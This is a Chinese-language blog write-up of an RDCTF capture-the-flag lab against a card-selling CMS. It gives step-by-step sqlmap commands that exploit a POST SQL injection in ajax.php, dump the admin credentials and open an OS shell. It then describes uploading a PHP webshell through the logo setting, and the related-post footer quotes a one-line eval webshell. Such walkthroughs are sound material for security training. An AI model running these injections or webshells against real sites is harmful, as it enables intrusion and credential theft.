RDCTF-考核

最新推荐文章于 2024-05-14 12:20:01 发布
最新推荐文章于 2024-05-14 12:20:01 发布
阅读量345 收藏
点赞数
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_45970858/article/details/108734963
版权

复制网站并打开找到注入点
在这里插入图片描述
在这里插入图片描述

找到注入的地方,发现购买那里是一个注入点
[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-ko79skqb-1600763445725)(https://ig-blog.csdnimg.cn/20200922162848947.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQ1OTcwODU4,size_16,color_FFFFFF,t_70#pic_center)]

此处可利用burp suite进行抓包
在这里插入图片描述

发现了一个能注入的点,利用post注入即可,
在这里插入图片描述
在这里插入图片描述

先将代码压缩成一个文件然后再用sqlmap跑
在这里插入图片描述
在这里插入图片描述

接着利用sqlmap跑数据库
python sqlmap.py -r c:\lyf\POST.txt -dbs
在这里插入图片描述
在这里插入图片描述

因为题目名字是faka所以跑faka的表
python sqlmap.py -r c:\lyf\POST.txt -D faka --tables
在这里插入图片描述
在此"C:\Program Files\Python37\sqlmapproject-sqlmap-bcea050\data\txt\common-columns.txt"路径下加上ayangw_k和ayangw_v字段
在这里插入图片描述

再跑字段
python sqlmap.py -r c:\lyf\POST.txt -D faka -T ayangw_config --columns
在这里插入图片描述
python sqlmap.py -r c:\lyf\POST.txt --dump -D faka -T ayangw_config -C ayangw_k,ayangw_v

或者python sqlmap.py -u “http://117.167.136.244:28057/ajax.php?act=selgo” --data “tyid=1” -D faka -T ayangw_config --dump在这里插入图片描述成功获得管理员帐户和密码
直接在网址后加上/admin/进入网站管理后台,登录上一步获得帐户和密码
在这里插入图片描述
在这里插入图片描述
在后台找到可以上传文件的地方,在系统设置的首页LOGO配置中
在这里插入图片描述
在这里插入图片描述
上传webshell文件
在这里插入图片描述
点击下方的图片选择复制图片链接,在浏览器中打开
在这里插入图片描述
在这里插入图片描述

将login后面的都改为php进行访问。发现空白页面,并没有报错,说明木马病毒植入成功。
在这里插入图片描述
打开蚁剑,用蚁剑连接网站后台获取文件找到flag
在这里插入图片描述
在这里插入图片描述
点击打开
发现文字显示FLAG=not_flag ,说明真正的flag不在其中

在这里插入图片描述
找到路径
在这里插入图片描述
点击进去,找到真正的flag为
flag{95251adb-5f5b-4797-bcb3-fdb76cfb5a06}
在这里插入图片描述
方法二:此时还可以利用sqlmap跑出flag
输入命令:–os-shel找到flag
python sqlmap.py -u “http://117.167.136.244:28057/ajax.php?act=selgo” --data “tyid=1” --os-shel
在这里插入图片描述
在这里插入图片描述
出现os-shell>,输入ls(这里为list缩写),列出目录
在这里插入图片描述
继续跑ls /home/(home为一个文件,后面接反斜杠才能跑出)
在这里插入图片描述
利用cat命令,找到flag
flag{95251adb-5f5b-4797-bcb3-fdb76cfb5a06}

在这里插入图片描述

几番89
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
实践篇(二):关系数据库到RDF
SimmerChan的专栏
01-06 1万+
对知识图谱有兴趣的读者可以关注我的知乎专栏,主要介绍知识图谱的相关概念、技术,也包含一些具体实践。 上一篇文章介绍了我们所使用的数据。其实,知识图谱数据的来源主要有三个:结构化数据、半结构化数据和非结构化的数据。我们所使用的电影数据就是结构化的数据。半结构化的数据指的是数据有一定的组织形式,但较结构化数据而言更松散(属性名和属性值具有多样性,比如“生日”就有“出生日期”、“诞辰”等多种表达方式)
轻量级内存计算引擎
cainiao_M的博客
09-27 1549
内存计算指数据事先存储于内存,各步骤中间结果不落硬盘的计算方式,适合性能要求较高,并发较大的情况。   HANA、TimesTen等内存数据库可实现内存计算,但这类产品价格昂贵结构复杂实施困难,总体拥有成本较高。本文介绍的集算器同样可实现内存计算,而且结构简单实施方便,是一种轻量级内存计算引擎。 下面就来介绍一下集算器实现内存计算的一般过程。 一、        启动服务器 集算器有两种...
RDCTF-faka
weixin_50401030的博客
09-19 422
进入题目找到注入点 找到注入的地方,发现购买那就是一个注入点 利用burp suite进行抓包 发现了一个能注入的点,利用post注入即可,先将代码压缩成一个文件然后再用sqlmap跑 接着利用sqlmap跑数据库 sqlmap -r F:\a.txt -D --tables faka 因为题目名字是faka所以跑faka的表 sqlmap -r F:\a.txt -D faka --tables 接着跑表 -r F:\a.txt -D faka -T ayangw_config..
最新网络安全:CTF入门必备之题型介绍_ctf网络安全大赛,2024年最新9次网络安全面试经验总结
最新发布
2401_84264662的博客
05-14 668
为了帮助大家更好的学习网络安全,小编给大家准备了一份网络安全入门/进阶学习资料,里面的内容都是适合零基础小白的笔记和资料,不懂编程也能听懂、看懂,所有资料共282G,朋友们如果有需要全套网络安全入门+进阶学习资源包,可以********************************************************************************************************************************点击免费领取。
[CTF-MISC]halfface
qq_41513009的博客
12-04 461
CTF MISC halfface 重新打开文件,发现hint.txt: 查一下OTk5OQ,发现是base64编码,解码得到9999999999符合密码的格式 解密y.zip得到: base64解码(要用urlsafe),写入图片,得到: 用zsteg查看隐写信息,发现xml元数据 用tweakpng打开发现 看到这个括号就明显是flag了,使用exiftool查看
SQLMap实战——RDCTF靶机训练
qq_50647304的博客
09-12 286
rdctf的题目练习 开启环境进入靶机 找到注入点,用sqlmap测试能否注入: 跑完以后发现能注入,输入python sqlmap.py -u “url” --dbs 查询数据库: 选择数据库rjxy,输入python sqlmap.py -u “url” -D rjxy --tables 查询数据表: 选择manager表,输入 ...
CTF入门--题目介绍
网络安全研究
02-04 4565
CTF 题目类型一般分为 Web 渗透、RE 逆向、Misc 杂项、PWN 二进制漏洞利用、Crypto 密码破译。
php 反序列注入,CTF中PHP反序列化和命令注入的一次简单利用
weixin_31796803的博客
04-07 715
代码来自第六届防灾科技学院网络安全技能大赛,侵删。php目标获取Linux服务器根目录下的flagpython代码/*home.php*/class home{private $method;private $args;function __construct($method, $args) {$this->method = $method;$this->args = $args;}f...
ctf php sql注入,CTF WEB SQL注入 writeups
weixin_35076990的博客
03-17 463
尝试了字符型、数字型注入,无果。使用burpsuite 进行爆破。使用 simple list 中的 sql 注入清单进行测试。intruder用法手工测试发现输入数字后都会出现(有wp说这种输出都是 var_dump() 函数输出的结果)。发现过滤了很多关键字,类似 delete、update等。结果出现 Too long,Nonono 、或者什么都没有显示。输入数字 1 时候的回显:Array...
CTF-11.SQL注入(post)
woo233的博客
09-20 922
SQL注入攻击指用用户构建特殊的输入作为参数传入Web应用程序,通过执行SQL语句进而执行攻击者所要的操作,其主要原因是程序没有细致地过滤用户输入的数据,致使非法数据侵入系统。任何一个用户可以输入的位置都可能是注入点。比如url中,以及http报文中,POST传递的参数;只要是用户可以输入的位置都是有可能存在注入点的;漏洞扫描器的扫描结果也不一定正确。
CTF实战(faka注入)
Marsper的博客
09-18 1284
CTF实战 SQL注入(faka) 方法一:蚁键注入 首先获取实战链接 访问链接打开,并按上篇文章所学寻找相关post提交处,设法找到注入点,如图,得知付款处即为post提交处 打开burp实行抓包,检测注入点是否正确 将注入点链接抛入sqlmap中寻找准确注入点,找出数据库,爆出后台管理员密码 输入sqlmap.py -u “117.167.136.244:28088/ajax.php?act=selgo” --data “tyid=1” -D faka -T ayangw_config --dum
Web安全-用一句话木马拿下RDCTF靶机实战1
qq_46231152的博客
09-15 617
一句话木马 一句话木马短小精悍,而且功能强大,隐蔽性非常好,在入侵中始终扮演着强大的作用。 本次使用的php一句话: <?php @eval($_POST['1']) ?> 用这段代码保存为一个php后门木马 上传木马 本次使用的是RDCTF平台的靶机实战 进入管理员后台界面 找到附件管理,发现了这里可以上传文件 将写好的一句话木马上传 回到首页,找到文件上传的网页 找到一句话木马文件 使用蚁剑连接 拿到flag ...
CTF考核writeup(1)
一段旅途
11-23 4217
在sql注入、文件上传和文件包含问题上,可以学到一些新思路。
某发卡cms的审计
https://www.cnblogs.com/zpchcbd/
04-27 1108
注意:代码审计的过程全写在注释里面 /ajax.php文件 存在SQL注入 <?php include 'ayangw/common.php'; //这里看到包含了common.php文件 主要就是对于配置的加载 里面没有封装任何过滤函数 @header('Content-Type: application/json; charset=UTF-8'); if(empty($_GET['a...
RDF数据库前十名
热门推荐
hanyueqi的专栏
04-24 1万+
摘自DB-Engines,观察了一下,分数主要通过人们讨论、使用、搜索引擎有效结果数量以及找工作中的需求进行排名,另外这些主要是原生支持的数据库进行对比,不涉及使用Hbase、Cassandra或者关系型数据库间接支持RDF。 1、MarkLogic Editorial information provided by DB-Engines Name Mark
web安全的一句话木马
IerkeU的博客
12-13 2269
一、WEBshell Webshell就是以asp、php、jsp或者cgi等网页文件形式存在的一种命令执行环境,也可以将其称做为一种网页后门。黑客在入侵了一个网站后,通常会将asp或php后门文件与网站服务器WEB目录下正常的网页文件混在一起,然后就可以使用浏览器来访问asp或者php后门,得到一个命令执行环境,以达到控制网站服务器的目的。 webshell根据脚本可以分为PHP脚本木马,ASP脚本木马,也有基于.NET的脚本木马和JSP脚本木马。在国外,还有用python脚本语言写的动态网页,当然也有与
NSSCTF刷题wp——常用编码
YougerXen的博客
04-10 4343
NSSCTF Crypto 探索 常用编码 前两个题ID303,287在入门时做过了,详见另一篇wp链接 [AFCTF 2018]BASE ID:463 打开文件直接麻了,如果人工解码,估计黄花菜都要凉了,这就需要用到拥有强大数据处理能力的python了,下面是我借鉴得几个大佬的脚本。 首先是大佬xenny的,NSSCTF这个题的wp也有 import re, base64 s = open('/Users/x3nny/Downloads/flag_encode.txt', 'rb').read() bas
WordPress 常用代码、方法
jiasudu
08-17 286
WordPress模板基本文件 style.css 样式表文件 index.php 主页文件 single.php 日志单页文件 page.php 页面文件 archvie.php 分类和日期存档页文件 searchform.php 搜索表单文件 search.php 搜索页面文件 comments.php 留言区域文件(包括留言列表和留言框) 404.php 404错误页面...
CTF在线练习平台
weixin_41949487的博客
02-25 4333
CTF在线练习平台 IDF实验室: http://ctf.idf.cn/ XCTF_OJ竞赛平台:http://oj.xctf.org.cn/problem_archives 网络信息安全攻防学习平台:http://hackinglab.cn/ OWASP在线网络安全攻防实验室:http://www.owasp.org.cn/owasp-project/security-l...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值